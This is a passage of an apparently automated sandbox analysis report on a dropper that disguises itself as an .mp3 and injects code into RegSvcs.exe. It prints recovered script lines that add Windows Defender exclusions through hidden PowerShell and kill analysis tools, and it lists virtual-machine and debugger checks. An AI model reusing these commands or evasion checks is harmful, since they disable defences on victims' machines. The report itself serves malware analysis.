Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2216123247.000000000198D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: riveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
Source: qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then`y
Source: qwlvpmrupf.mp3, 00000007.00000003.1947990948.00000000010A2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947564822.000000000109B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1948427869.00000000010A3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950258431.00000000010B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exe
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: ngPebbPhbp.exe, 00000000.00000003.1739308660.000000000354F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenVy
Source: qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenp21
Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2294257622.00000000013E9000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2296155124.00000000013FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exe7>
Source: OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2215043797.00000000019DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exe
Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213103873.0000000001988000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215757310.000000000198A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216123247.000000000198D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Then
Source: C:\Users\user\Desktop\ngPebbPhbp.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003EF3FF BlockInput, 7_2_003EF3FF
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B26878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00B26878
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00375D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 7_2_00375D78
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B2ECAA mov eax, dword ptr fs:[00000030h] 0_2_00B2ECAA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00395078 mov eax, dword ptr fs:[00000030h] 7_2_00395078
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05561277 mov eax, dword ptr fs:[00000030h] 14_2_05561277
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03280283 mov eax, dword ptr fs:[00000030h] 15_3_03280283
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB5078 mov eax, dword ptr fs:[00000030h] 16_2_00DB5078
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066C7A45 mov eax, dword ptr fs:[00000030h] 17_2_066C7A45
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066CA22E mov eax, dword ptr fs:[00000030h] 17_2_066CA22E
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066CA28B mov eax, dword ptr fs:[00000030h] 17_2_066CA28B
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B32CE0 GetProcessHeap, 0_2_00B32CE0
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B26878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00B26878
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B2AAC4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00B2AAC4
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B26A0B SetUnhandledExceptionFilter, 0_2_00B26A0B
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B25BBF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00B25BBF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003A29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_003A29B2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00390BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00390BCF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00390D65 SetUnhandledExceptionFilter, 7_2_00390D65
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00390FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00390FB1
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DC29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00DC29B2
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00DB0BCF
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB0D65 SetUnhandledExceptionFilter, 16_2_00DB0D65
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00DB0FB1
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: 14.2.RegSvcs.exe.310c174.2.raw.unpack, Flutter.cs Reference to suspicious API methods: VirtualAlloc(IntPtr.Zero, new IntPtr(65536), MEM_COMMIT, 4u)
Source: 14.2.RegSvcs.exe.310c174.2.raw.unpack, Flutter.cs Reference to suspicious API methods: Marshal.WriteIntPtr(new IntPtr(intPtr.ToInt64() + num), GetProcAddress(moduleHandle, array[i]))
Source: 14.2.RegSvcs.exe.310c174.2.raw.unpack, Flutter.cs Reference to suspicious API methods: VirtualProtect(intPtr, 65536u, 64u, out var _)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 990000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BB0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 700000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 990000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BB0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 700000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 990000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 782000
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FC5000
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: BB0000
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 8CD000
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 700000
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 44A000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003D1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 7_2_003D1A91
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00373312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 7_2_00373312
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct") memstr_024668af-4
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for $objantivirusproduct in $colitems memstr_839a4043-7
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $usb = $objantivirusproduct.displayname memstr_3ea2d620-a
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: next memstr_40f250bf-8
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return $usb memstr_6911e3a1-3
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc ;==>antivirus memstr_a788ce8f-d
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func disabler() memstr_9cfc67f4-2
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;if antivirus() = "windows defender" then memstr_88363666-1
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;#requireadmin memstr_35a5b242-c
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " -command add-mppreference -exclusionpath " & @scriptdir, "", "", @sw_hide) memstr_e5f8c176-5
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide) memstr_df9b808e-7
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide) memstr_63049b3f-0
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide) memstr_b10eb256-9
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide) memstr_b6f8f66e-7
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide) memstr_3c585536-a
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;endif memstr_4dbc1717-4
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc ;==>disabler memstr_0c69540c-4
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func antianalysis() memstr_9d395c50-f
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("process explorer") then memstr_55a52968-2
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winclose("process explorer") memstr_f11f3a3e-1
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("procexp64.exe") memstr_04f452c3-2
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("procexp.exe") memstr_bc9a639d-2
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("process hacker") then memstr_c7389a6e-6
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winclose("process hacker") memstr_0432f897-0
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("processhacker.exe") memstr_2dceed27-f
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if processexists("taskmgr.exe") then memstr_90e183a4-5
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("taskmgr.exe") memstr_bebcb323-0
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if processexists("regshot.exe") then memstr_5784a0d4-a
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: setup=rmxb.vbe memstr_665cfb78-2
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tempmode memstr_7e863389-f
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: silent=1 memstr_e1cbc0de-3
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\local\temp\rarsfx0| memstr_40750185-0
Source: ngPebbPhbp.exe, 00000000.00000003.1737245206.0000000003557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\local\temp\rarsfx0 memstr_8eb40578-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =h#mvto memstr_64f5bdf4-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =e#muf memstr_ac2a55c6-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$4svw3 memstr_2a672b7c-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$4jspv memstr_a4b07c82-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d$$spv memstr_74750637-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: acting anxv.ppt memstr_19cab26d-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ( wj(,wj memstr_27ea0c43-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ,dwj,pwj memstr_76c076a6-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0hwj0twj memstr_1c2f9c29-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736079973.000000000359A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |8xjarbgcazh-chscsdadeelenesfifrhehuisitjakonlnoplptro memstr_0de08564-6
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /3:3b3f3l3p3v3`3j3t3 memstr_e8d07c68-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4%4/494c4n4v4z4`4d4j4t4~4 memstr_075a2ae1-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5%5)5/53595c5m5w5b5j5n5t5x5~5 memstr_81360ee1-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6&61696=6c6g6m6w6a6k6v6~6 memstr_c015117e-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7&707:7e7m7q7w7[7a7k7u7 memstr_6db3bd7f-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8 8&8*808:8d8n8y8a8e8k8o8u8 memstr_412b3248-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9(90949:9>9d9n9x9b9m9u9y9 memstr_6789d1f8-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :':1:<:d:h:n:r:x:b:l:v: memstr_b0a3b149-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;!;';1;;;e;p;x;\;b;f;l;v; memstr_9ab808ed-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <'<+<1<5<;<e<o<y<d<l<p<v<z< memstr_061a582e-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =(=3=;=?=e=i=o=y=c=m=x= memstr_69ddb517-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >(>2><>g>o>s>y>]>c>m>w> memstr_c90d6ae7-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?"?(?,?2?<?f?p?[?c?g?m?q?w? memstr_f02a188e-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0*02060<0@0f0p0z0d0o0w0{0 memstr_322db1b9-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1)131>1f1j1p1t1z1d1n1x1 memstr_19ab7d01-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2#2)232=2g2r2z2^2d2h2n2x2 memstr_347e12ec-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3!3)3-33373=3g3q3[3f3n3r3x3|3 memstr_b156ac8e-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4 4*454=4a4g4k4q4[4e4o4z4 memstr_d899dc40-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5 5*545>5i5q5u5[5_5e5o5y5 memstr_86404415-4
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6 6$6*6.646>6h6r6]6e6i6o6s6y6 memstr_2bf5d672-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7!7,74787>7b7h7r7\7f7q7y7}7 memstr_eb206423-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8!8+858@8h8l8r8v8\8f8p8z8 memstr_94045ba5-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9!9%9+959?9i9t9\9`9f9j9p9z9 memstr_34ee5909-3
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :#:+:/:5:9:?:i:s:]:h:p:t:z:~: memstr_205f819a-7
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;";,;7;?;c;i;m;s;];g;q;|; memstr_008fdcc7-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <"<,<6<@<k<s<w<]<a<g<q<{< memstr_9e4646d3-2
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ="=&=,=0=6=@=j=t=_=g=k=q=u={= memstr_af200e4f-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >#>.>6>:>@>d>j>t>^>h>s>{> memstr_2785f33c-1
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?#?-?7?b?j?n?t?x?^?h?r?|? memstr_2064e8d5-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0#0'0-070a0k0v0^0b0h0l0r0|0 memstr_1249b801-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1%1-11171;1a1k1u1_1j1r1v1|1 memstr_d8e327c9-f
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2$2.292a2e2k2o2u2_2i2s2~2 memstr_71aec8ea-c
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3$3.383b3m3u3y3_3c3i3s3}3 memstr_ef9397f6-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4$4(4.42484b4l4v4a4i4m4s4w4}4 memstr_305e74d6-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5%50585<5b5f5l5v5`5j5u5}5 memstr_e7bad43a-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6%6/696d6l6p6v6z6`6j6t6~6 memstr_bbe7d86e-d
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7%7)7/797c7m7x7`7d7j7n7t7~7 memstr_7037bc67-8
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8'8/83898=8c8m8w8a8l8t8x8~8 memstr_46f19e29-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9&909;9c9g9m9q9w9a9k9u9 memstr_eab55a96-a
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: : :&:0:::d:o:w:[:a:e:k:u: memstr_ef1e29fb-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;&;*;0;4;:;d;n;x;c;k;o;u;y; memstr_955b38e1-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <'<2<:<><d<h<n<x<b<l<w< memstr_d8c279bc-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ='=1=;=f=n=r=x=\=b=l=v= memstr_763a7227-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >!>'>+>1>;>e>o>z>b>f>l>p>v> memstr_a810140d-5
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?)?1?5?;???e?o?y?c?n?v?z? memstr_84d3b348-0
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0(020=0e0i0o0s0y0c0m0w0 memstr_40b55d42-b
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1"1(121<1f1q1y1]1c1g1m1w1 memstr_a8237a83-9
Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2 2(2,22262<2f2p2z2e2m2q2w2{2 memstr_f0476285-d
